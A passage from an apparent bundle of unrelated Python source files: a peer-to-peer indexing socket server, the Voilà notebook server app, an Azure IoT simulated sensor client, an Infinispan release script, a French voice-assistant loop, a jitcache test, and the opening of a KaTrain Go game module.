print(f"Average time taken 1000 changing drive loops alternative order is: {taken}s")
print()
print()
print()
|
server.py
|
import os
import sys
import socket
import threading
import json
import click
SIZE = 1024
FORMAT = "utf-8"
SERVER_DATA_PATH = "./"
peer_table = {}
filesize_table = {}
md5_table = {}
cond = threading.Condition()
def clientHandler(conn, addr):
global peer_table
global cond
full_addr = addr[0] + ":" + str(addr[1])
print(f"[NEW CONNECTION] {addr} connected.")
conn.send(json.dumps({"type": "OK", "msg": "Welcome to indexing server!"}).encode(FORMAT))
while True:
data = conn.recv(SIZE).decode(FORMAT)
if not data:
# delete record in peer_table when data = None, client has disconnected
print(f"[UNREGISTER] {full_addr} unrigistered")
cond.acquire()
del peer_table[full_addr]
cond.release()
break
json_data = json.loads(data)
if json_data["action"] == "REGISTER":
# register file list from peers
print(f"[REGISTER] {full_addr} registerd")
cond.acquire()
peer_table[full_addr] = json_data["filelist"]
for i in range(len(json_data['filelist'])):
filesize_table[json_data['filelist'][i]] = json_data['filesizelist'][i]
md5_table[json_data['filelist'][i]] = json_data['md5list'][i]
# print(peer_table)
# print(filesize_table)
cond.release()
elif json_data["action"] == "UPDATE":
# Update file list of peers
print(f"[UPDATE] {full_addr} file list updated")
cond.acquire()
peer_table[full_addr] = json_data["filelist"]
for i in range(len(json_data['filelist'])):
filesize_table[json_data['filelist'][i]] = json_data['filesizelist'][i]
md5_table[json_data['filelist'][i]] = json_data['md5list'][i]
# print(peer_table)
cond.release()
elif json_data["action"] == "QUERY":
# query for a file
query_file = json_data["file"]
print(f"[QUERY] {full_addr} query {query_file}")
res = []
cond.acquire()
for peer, filelist in peer_table.items():
if peer != full_addr and query_file in filelist:
res.append(peer)
cond.release()
if len(res) > 0:
conn.send(json.dumps({"type": "QUERY-RES", "peerlist": res, "file": query_file, "filesize": filesize_table[query_file], "md5": md5_table[query_file]}).encode(FORMAT))
else:
conn.send(json.dumps({"type": "QUERY-RES", "peerlist": res, "file": query_file, "filesize": 0, "md5": 0}).encode(FORMAT))
conn.close()
@click.command()
@click.option('--port',
default="5000",
help='Hosting port')
def startIndexingServer(port):
print("[STARTING] Indexing Server is starting")
port = int(port)
localhost = socket.gethostbyname(socket.gethostname())
hosting_addr = (localhost, port)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(hosting_addr)
server.listen()
print(f"[LISTENING] Indexing Server is listening on {localhost}:{port}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=clientHandler, args=(conn, addr))
thread.daemon = True
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
if __name__ == "__main__":
try:
startIndexingServer()
except KeyboardInterrupt:
print("\n[SHUTDOWN] Indexing server is down")
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
from .shutdown_kernel_handler import VoilaShutdownKernelHandler
from .voila_kernel_manager import voila_kernel_manager_factory
from .query_parameters_handler import QueryStringSocketHandler
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{
'Voila': {'log_level': logging.DEBUG},
'VoilaConfiguration': {'show_tracebacks': True},
},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload to server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions',
'show_tracebacks': 'VoilaConfiguration.show_tracebacks',
'preheat_kernel': 'VoilaConfiguration.preheat_kernel',
'pool_size': 'VoilaConfiguration.default_pool_size'
}
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to Voilà API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overridable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
self.contents_manager = LargeFileManager(parent=self)
preheat_kernel: bool = self.voila_configuration.preheat_kernel
pool_size: int = self.voila_configuration.default_pool_size
kernel_manager_class = voila_kernel_manager_factory(
self.voila_configuration.multi_kernel_manager_class,
preheat_kernel,
pool_size
)
self.kernel_manager = kernel_manager_class(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
(url_path_join(self.server_url, r'/voila/api/shutdown/(.*)'), VoilaShutdownKernelHandler)
])
if preheat_kernel:
handlers.append(
(
url_path_join(self.server_url, r'/voila/query/%s' % _kernel_id_regex),
QueryStringSocketHandler
)
)
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def listen(self):
success = False
for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url, base_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
iot-hub-client-dual.py
|
import json
import random
import re
import sys
import threading
import time
from azure.iot.device import IoTHubDeviceClient, Message
AUX_CONNECTION_STRING = sys.argv[1]
DEVICE_NAME=AUX_CONNECTION_STRING.split(";")[1].split("=")[1]
AUX_BASE_HEART_RATE = 65
AUX_BASE_BODY_TEMPERATURE = 37.0
AUX_MAXIMUM_BODY_TEMPERATURE = 40.0
#SENSOR DATA WILL HOST SENSOR METRICS
sensor_data = {}
#METHOD FOR ONE METRIC
def get_sensor_temperature():
temperature = AUX_BASE_BODY_TEMPERATURE + (random.random() * random.random() * 5)
return temperature
#METHOD FOR ONE METRIC
def get_sensor_heart_rate():
heart_rate = AUX_BASE_HEART_RATE + (random.random() * random.random() * 15)
return heart_rate
def aux_validate_connection_string():
if not AUX_CONNECTION_STRING.startswith( 'HostName=' ):
print ("ERROR - YOUR IoT HUB CONNECTION STRING IS NOT VALID")
print ("FORMAT - HostName=your_iot_hub_name.azure-devices.net;DeviceId=your_device_name;SharedAccessKey=your_shared_access_key")
sys.exit()
def message_listener(client):
while True:
message = client.receive_message()
print("Message received")
print( " Data: {}".format( message.data.decode("utf-8") ) )
print( " Properties: {}".format(message.custom_properties))
def aux_iothub_client_init():
client = IoTHubDeviceClient.create_from_connection_string(AUX_CONNECTION_STRING)
return client
def iothub_client_telemetry_sample_run():
try:
aux_validate_connection_string()
client = aux_iothub_client_init()
print ( "IoT Hub Simulated body sensor" )
print ( "Press Ctrl-C to exit" )
#ENABLE THE RECEPTION THREAD, DEFINING THE TARGET METHOD
message_listener_thread = threading.Thread(target=message_listener, args=(client,))
message_listener_thread.daemon = True
message_listener_thread.start()
#IT WILL RUN FOREVER UNLESS YOU STOP IT
while True:
#COLLECTING SENSOR VALUES
#NEW METRIC COLLECTION SHOULD ADD CODE HERE
temperature_measure = get_sensor_temperature()
heart_rate_measure = get_sensor_heart_rate()
sensor_data['device_name'] = DEVICE_NAME
#STORING SENSOR VALUES IN DATA STRUCTURE
#NEW METRIC COLLECTION SHOULD ADD CODE HERE
sensor_data['temperature'] = temperature_measure
sensor_data['heart_rate'] = heart_rate_measure
#TRANFORMING IT TO JSON
json_sensor_data = json.dumps(sensor_data)
#CREATING AN AZURE IOT MESSAGE OBJECT
azure_iot_message = Message(json_sensor_data)
#ADDING A CUSTOM PROPERTY OF OUR CHOICE TO THE MESSAGE CALLED temperature_alert
if temperature_measure > AUX_MAXIMUM_BODY_TEMPERATURE:
azure_iot_message.custom_properties["temperature_alert"] = "true"
else:
azure_iot_message.custom_properties["temperature_alert"] = "false"
#SETTING PROPER MESSAGE ENCODING
azure_iot_message.content_encoding='utf-8'
azure_iot_message.content_type='application/json'
#SENDING THE MESSAGE
print( "Sending azure_iot_message: {}".format(azure_iot_message) )
client.send_message(azure_iot_message)
print ( "Message successfully sent" )
#SLEEPING FOR A SECOND BEFORE RESTARTING
time.sleep(1)
except KeyboardInterrupt:
print ( "IoTHubClient sample stopped" )
if __name__ == '__main__':
iothub_client_telemetry_sample_run()
|
release.py
|
#!/usr/bin/python
import re
import sys
import os
import os.path
import subprocess
import shutil
import tempfile
from datetime import *
from multiprocessing import Process
from utils import *
try:
from xml.etree.ElementTree import ElementTree
except:
prettyprint('''
Welcome to the Infinispan Release Script.
This release script requires that you use at least Python 2.5.0. It appears
that you do not have the ElementTree XML APIs available, which are available
by default in Python 2.5.0.
''', Levels.FATAL)
sys.exit(1)
modules = []
uploader = None
git = None
def help_and_exit():
prettyprint('''
Welcome to the Infinispan Release Script.
%s Usage:%s
$ bin/release.py <version> <branch to tag from> <--mvn-only>
%s E.g.,%s
$ bin/release.py 6.1.1.Beta1 %s<-- this will tag off master.%s
$ bin/release.py 6.1.1.Beta1 6.1.x %s<-- this will use the appropriate branch.%s
$ bin/release.py 6.1.1.Beta1 6.1.x --mvn-only %s<-- this will only tag and release to maven (no dstribution).%s
''' % (Colors.yellow(), Colors.end_color(), Colors.yellow(), Colors.end_color(), Colors.green(), Colors.end_color(), Colors.green(), Colors.end_color(), Colors.green(), Colors.end_color()), Levels.INFO)
sys.exit(0)
def validate_version(version):
version_pattern = get_version_pattern()
if version_pattern.match(version):
return version.strip()
else:
prettyprint("Invalid version '"+version+"'!\n", Levels.FATAL)
help_and_exit()
def tag_release(version, branch):
if git.remote_branch_exists():
git.switch_to_branch()
git.create_tag_branch()
else:
prettyprint("Branch %s cannot be found on upstream repository. Aborting!" % branch, Levels.FATAL)
sys.exit(100)
def get_project_version_tag(tree):
return tree.find("./{%s}version" % (maven_pom_xml_namespace))
def get_parent_version_tag(tree):
return tree.find("./{%s}parent/{%s}version" % (maven_pom_xml_namespace, maven_pom_xml_namespace))
def get_properties_version_tag(tree):
return tree.find("./{%s}properties/{%s}project-version" % (maven_pom_xml_namespace, maven_pom_xml_namespace))
def write_pom(tree, pom_file):
tree.write("tmp.xml", 'UTF-8')
in_f = open("tmp.xml")
out_f = open(pom_file, "w")
try:
for l in in_f:
newstr = l.replace("ns0:", "").replace(":ns0", "").replace("ns1", "xsi")
out_f.write(newstr)
finally:
in_f.close()
out_f.close()
os.remove("tmp.xml")
if settings['verbose']:
prettyprint(" ... updated %s" % pom_file, Levels.INFO)
def patch(pom_file, version):
'''Updates the version in a POM file. We need to locate //project/parent/version, //project/version and
//project/properties/project-version and replace the contents of these with the new version'''
if settings['verbose']:
prettyprint("Patching %s" % pom_file, Levels.DEBUG)
tree = ElementTree()
tree.parse(pom_file)
need_to_write = False
tags = []
tags.append(get_parent_version_tag(tree))
tags.append(get_project_version_tag(tree))
tags.append(get_properties_version_tag(tree))
for tag in tags:
if tag != None and "-SNAPSHOT" in tag.text:
if settings['verbose']:
prettyprint("%s is %s. Setting to %s" % (str(tag), tag.text, version), Levels.DEBUG)
tag.text=version
need_to_write = True
if need_to_write:
# write to file again!
write_pom(tree, pom_file)
return True
else:
if settings['verbose']:
prettyprint("File doesn't need updating; nothing replaced!", Levels.DEBUG)
return False
def get_poms_to_patch(working_dir):
poms_to_patch = [working_dir + "/pom.xml"]
return poms_to_patch
def update_versions(base_dir, version):
os.chdir(base_dir)
poms_to_patch = get_poms_to_patch(".")
modified_files = []
for pom in poms_to_patch:
if patch(pom, version):
modified_files.append(pom)
pieces = re.compile('[\.\-]').split(version)
snapshot = pieces[3]=='SNAPSHOT'
final = pieces[3]=='Final'
# Now make sure this goes back into the repository.
git.commit(modified_files, "'Release Script: update versions for %s'" % version)
# And return the next version
if final:
return pieces[0] + '.' + pieces[1] + '.' + str(int(pieces[2])+ 1) + '-SNAPSHOT'
else:
return None
def get_module_name(pom_file):
tree = ElementTree()
tree.parse(pom_file)
return tree.findtext("./{%s}artifactId" % maven_pom_xml_namespace)
def do_task(target, args, async_processes):
if settings['multi_threaded']:
async_processes.append(Process(target = target, args = args))
else:
target(*args)
### This is the starting place for this script.
def release():
global settings
global uploader
global git
assert_python_minimum_version(2, 5)
require_settings_file()
# We start by determining whether the version passed in is a valid one
if len(sys.argv) < 2:
help_and_exit()
base_dir = os.getcwd()
version = validate_version(sys.argv[1])
branch = "master"
mvn_only = False
if len(sys.argv) > 2:
if sys.argv[2].startswith("--mvn-only"):
mvn_only = True
else:
branch = sys.argv[2]
if len(sys.argv) > 3:
if sys.argv[3].startswith("--mvn-only"):
mvn_only = True
else:
prettyprint("Unknown argument %s" % sys.argv[3], Levels.WARNING)
help_and_exit()
prettyprint("Releasing Infinispan Cloud CacheStore version %s from branch '%s'" % (version, branch), Levels.INFO)
sure = input_with_default("Are you sure you want to continue?", "N")
if not sure.upper().startswith("Y"):
prettyprint("... User Abort!", Levels.WARNING)
sys.exit(1)
prettyprint("OK, releasing! Please stand by ...", Levels.INFO)
## Set up network interactive tools
if settings['dry_run']:
# Use stubs
prettyprint("*** This is a DRY RUN. No changes will be committed. Used to test this release script only. ***", Levels.DEBUG)
prettyprint("Your settings are %s" % settings, Levels.DEBUG)
uploader = DryRunUploader()
else:
uploader = Uploader()
git = Git(branch, version)
if not git.is_upstream_clone():
proceed = input_with_default('This is not a clone of an %supstream%s Infinispan Cloud CacheStore repository! Are you sure you want to proceed?' % (Colors.UNDERLINE, Colors.END), 'N')
if not proceed.upper().startswith('Y'):
prettyprint("... User Abort!", Levels.WARNING)
sys.exit(1)
## Make sure we don't include un-needed content in the release
prettyprint("Step 1: Cleaning up working directory (un-tracked and modified files)", Levels.INFO)
git.clean_release_directory()
prettyprint("Step 1: Complete", Levels.INFO)
## Release order:
# Step 1: Tag in Git
prettyprint("Step 2: Tagging %s in git as %s" % (branch, version), Levels.INFO)
tag_release(version, branch)
prettyprint("Step 2: Complete", Levels.INFO)
# Step 2: Update version in tagged files
prettyprint("Step 3: Updating version number in source files", Levels.INFO)
version_next = update_versions(base_dir, version)
prettyprint("Step 3: Complete", Levels.INFO)
# Step 3: Build and test in Maven
prettyprint("Step 4: Build and test in Maven", Levels.INFO)
maven_build_distribution(version)
prettyprint("Step 4: Complete", Levels.INFO)
## Tag the release
git.tag_for_release()
step_no=5
# Switch back to the branch being released
git.switch_to_branch()
# Update to next version
if version_next is not None:
prettyprint("Step %s: Updating version number for next release" % step_no, Levels.INFO)
update_versions(base_dir, version_next)
prettyprint("Step %s: Complete" % step_no, Levels.INFO)
if not settings['dry_run']:
git.push_tag_to_origin()
if version_next is not None:
git.push_branch_to_origin()
git.cleanup()
else:
prettyprint("In dry-run mode. Not pushing tag to remote origin and not removing temp release branch %s." % git.working_branch, Levels.DEBUG)
prettyprint("\n\n\nDone!", Levels.INFO)
if __name__ == "__main__":
release()
|
main.py
|
from utils import *
from process import *
from server import run_server
import multiprocessing,requests
p = multiprocessing.Process(target=run_server, args=())
p.daemon = True
path_volume= abspath(__file__)+"_data/"
keyword= "ok assistant"
list_stop= get_tree_by_tag("start>stop")['keywords']
volumes={str(path_volume):{'bind': '/volume', 'mode': 'rw'}}
DEFAULT_HOST= "127.0.0.1"
DEFAULT_PORT= "5000"
def url(route="",host=DEFAULT_HOST,port=DEFAULT_PORT):
return 'http://'+host+':'+port+'/'+route
if __name__ == '__main__':
show= True
p.start()
while True:
if show:
print("\nJe suis votre assistant, dites: \n[\"ok assistant\"] pour m'appeler \n[\"quitter\"] pour quitter")
show= False
speech= speech_to_text("False")
if speech:
if keyword in speech:
show= True
if auth():
Tree()
else:
text_to_speech("l'authentification a échouée")
else:
stop= False
for word in list_stop:
if word in speech:
stop= True
if stop:
print("Fin de programme...")
break
p.terminate()
|
test_process.py
|
import multiprocessing as mp
from jitcache import Cache
import time
cache = Cache()
@cache.memoize
def slow_fn(input_1, input_2):
print("Slow Function Called")
time.sleep(1)
return input_1 * input_2
def test_process():
kwarg_dict = {"input_1": 10, "input_2": 4}
n_processes = 10
process_list = []
# Create a set of processes who will request the same value
for i in range(n_processes):
p = mp.Process(target=slow_fn, kwargs=kwarg_dict)
process_list.append(p)
# Start each process
for p in process_list:
p.start()
# Wait for completion
for p in process_list:
p.join()
# Print the value that they tried to compute
assert slow_fn(**kwarg_dict) == 40
|
game.py
|
import copy
import math
import os
import re
import threading
from datetime import datetime
from typing import Dict, List, Optional, Union
from kivy.clock import Clock
from katrain.core.constants import (
ANALYSIS_FORMAT_VERSION,
OUTPUT_DEBUG,
OUTPUT_INFO,
PLAYER_AI,
PLAYER_HUMAN,
PROGRAM_NAME,
SGF_INTERNAL_COMMENTS_MARKER,
STATUS_ANALYSIS,
STATUS_ERROR,
STATUS_INFO,
STATUS_TEACHING,
)
from katrain.core.engine import KataGoEngine
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n, rank_label
from katrain.core.sgf_parser import SGF, Move
from katrain.core.utils import var_to_grid
class IllegalMoveException(Exception):
pass
class KaTrainSGF(SGF):
_NODE_CLASS = GameNode
class Game:
"""Represents a game of go, including an implementation of capture rules."""
DEFAULT_PROPERTIES = {"GM": 1, "FF": 4}
def __init__(
self,
katrain,
engine: Union[Dict, KataGoEngine],
move_tree: GameNode = None,
